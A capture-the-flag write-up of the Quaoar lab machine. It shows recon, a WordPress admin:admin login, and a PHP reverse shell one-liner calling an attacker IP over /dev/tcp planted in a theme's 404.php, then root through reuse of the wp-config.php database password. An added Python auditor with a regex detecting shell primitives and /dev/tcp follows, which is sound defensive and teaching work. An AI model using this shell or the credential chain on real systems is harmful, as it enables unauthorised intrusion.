Quaoar is the first box in the Hackfest 2016 series. A textbook lesson in why default credentials and password reuse are still the two most common findings on real engagements. WordPress admin:admin gets you to the theme editor, that gets you a shell, and the database password in wp-config.php is the same as root's. Total time roughly 25 minutes.
01_Reconnaissance
Standard nmap. SSH 22, DNS 53, HTTP 80, plus IMAP/POP3. Web root is empty but /wordpress/ hosts a default-themed install.
$ nmap -sV -p- 192.168.1.20
22/tcp open ssh
53/tcp open domain
80/tcp open http
$ dirb http://192.168.1.20/
==> /wordpress/
02_WordPress_admin:admin
Tried admin:admin on /wordpress/wp-login.php — straight in. Theme editor under Appearance lets you write PHP into the active theme's 404.php. Drop a one-liner reverse shell, hit /wp-content/themes/twentyfourteen/404.php to fire it.
# Append to 404.php in theme editor
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.1.100/4444 0>&1'"); ?>
# Listener + trigger
$ nc -lvnp 4444 &
$ curl http://192.168.1.20/wordpress/wp-content/themes/twentyfourteen/404.php
connect from 192.168.1.20 — www-data shell
03_Root_via_wp-config.php_Reuse
wp-config.php stores the WordPress DB password — same password is reused for the local root account. su root with that string and you're done.
www-data@Quaoar:/$ cat /var/www/wordpress/wp-config.php | grep DB_PASSWORD
define('DB_PASSWORD', '[REDACTED]');
www-data@Quaoar:/$ su root
Password: [REDACTED]
root@Quaoar:/# id
uid=0(root) gid=0(root)
# cat /root/flag.txt
[REDACTED]
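Both steps of this chain leave a trace that an administrator can audit for: the theme editor only works when wp-config.php does not set DISALLOW_FILE_EDIT to true, a PHP file written through it ends up in the themes directory with shell-execution primitives in it, and the DB_PASSWORD constant is the secret whose reuse handed over root. The script below is an added example written for this page, not part of the original writeup or of WordPress. It parses the define() constants out of a wp-config.php, flags a missing DISALLOW_FILE_EDIT and a short or default DB_PASSWORD, and walks a themes directory for PHP files containing exec()-style calls or the /dev/tcp pattern. The sample config and theme files it audits are constructed inline in demo(); the weak-password list and the 12-character threshold are the example's own assumptions. Whether the DB password is also the root password cannot be checked from the config alone; the point of flagging it is that a secret readable by www-data should never be one that unlocks a privileged account.

```python
"""Audit a WordPress install for the weaknesses the Quaoar chain relies on:
an enabled theme editor, a weak database password, and PHP dropped into a theme."""
import os
import re
import tempfile

# Matches define('NAME', 'value') and define('NAME', true|false) in wp-config.php.
DEFINE_RE = re.compile(
    r"""define\(\s*['"](\w+)['"]\s*,\s*(true|false|['"]([^'"]*)['"])\s*\)""",
    re.IGNORECASE,
)

# Shell-execution primitives that have no business in a theme's 404.php,
# plus the bash /dev/tcp idiom used for reverse shells.
SHELL_PRIMITIVES = re.compile(
    r"\b(exec|shell_exec|system|passthru|popen|proc_open)\s*\(|/dev/tcp/"
)

# Assumed weak-password list for the example; a real audit would use a
# breached-password source.
WEAK_PASSWORDS = {"", "root", "admin", "password", "wordpress"}


def parse_wp_config(text):
    """Return the define()'d constants as a dict (booleans for true/false)."""
    consts = {}
    for m in DEFINE_RE.finditer(text):
        name = m.group(1)
        if m.group(3) is not None:
            consts[name] = m.group(3)
        else:
            consts[name] = m.group(2).lower() == "true"
    return consts


def audit_wp_config(text):
    """List findings for a wp-config.php body."""
    consts = parse_wp_config(text)
    findings = []
    if consts.get("DISALLOW_FILE_EDIT") is not True:
        findings.append(
            "DISALLOW_FILE_EDIT not set to true: any admin can write PHP via the theme editor"
        )
    pw = consts.get("DB_PASSWORD", "")
    if not isinstance(pw, str) or len(pw) < 12 or pw.lower() in WEAK_PASSWORDS:
        findings.append("DB_PASSWORD is empty, short or a default value")
    return findings


def scan_theme_dir(root):
    """Return (relative path, line number) for theme PHP lines with shell primitives."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, errors="replace") as fh:
                for lineno, line in enumerate(fh, 1):
                    if SHELL_PRIMITIVES.search(line):
                        hits.append((os.path.relpath(path, root), lineno))
    return hits


def demo():
    """Audit a constructed sample install: a config without DISALLOW_FILE_EDIT
    and with a short DB password, and a theme whose 404.php carries an
    injected exec() call. Returns (config findings, theme hits)."""
    cfg = (
        "<?php\n"
        "define('DB_NAME', 'wordpress');\n"
        "define('DB_PASSWORD', 'wpdb123');\n"  # constructed sample value
    )
    with tempfile.TemporaryDirectory() as tmp:
        themes = os.path.join(tmp, "themes")
        theme = os.path.join(themes, "twentyfourteen")
        os.makedirs(theme)
        with open(os.path.join(theme, "404.php"), "w") as fh:
            fh.write('<?php get_header(); ?>\n<?php exec("PLACEHOLDER"); ?>\n')
        with open(os.path.join(theme, "index.php"), "w") as fh:
            fh.write("<?php get_header(); get_footer(); ?>\n")
        return audit_wp_config(cfg), scan_theme_dir(themes)


if __name__ == "__main__":
    config_findings, theme_hits = demo()
    for f in config_findings:
        print("config:", f)
    for path, lineno in theme_hits:
        print(f"theme: {path}:{lineno} contains a shell primitive")
```

Run against a live install by pointing audit_wp_config() at the file contents and scan_theme_dir() at wp-content/themes. The fix for the first finding is one line in wp-config.php, define('DISALLOW_FILE_EDIT', true);, which removes the editor the writeup used; the second and third findings are the ones that should trigger a credential rotation and a file-integrity review.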
04_Attack_Chain_Summary
- 01 nmap → /wordpress/ default install
- 02 Login admin:admin → theme editor → 404.php reverse shell
- 03 wp-config.php DB_PASSWORD reused for root
- 04 su root → /root/flag.txt